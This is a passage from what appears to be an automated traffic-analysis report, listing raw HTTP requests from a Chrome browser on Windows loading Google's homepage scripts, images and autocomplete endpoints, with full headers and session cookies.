Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /client_204?cs=1&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBc..i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA%2Fbr%3D1%2Frs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fck%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_9 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /async/hpba?yv=3&cs=0&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/dg%3D0/br%3D1/rs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:/xjs/_/ss/k%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/br%3D1/rs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/ck%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBY..i HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=1/ed=1/dg=3/br=1/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RCF5Sd:X1kBmd;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;Uvc8o:VDovNc;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lbfkyf:MqGdUd;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb,yDVVkb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fet
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=QVhbZ6XKF6u3i-gP-ZzZoAs.1734039622974&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=lOO0Vd,sy8i,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=WEzy2GnTVCwd42wvY6cLz11ymcwUARJq0b8yzb-puulQFCcfrMH7cT_brk7HuA4AZKTjaQ3xhalkcNI12rZC3Rfa0rEgjsWoNZAPZW14aRoLTUNgtFCL9TgpV_3_L1wXS4addnHRJpNLLsgPhASys3Q-3WsTx-w7d9ZKvWN9U4jyHfIQy4Ue0Gc1SnRxOl06n3lUikj73ARjQvUjpGU
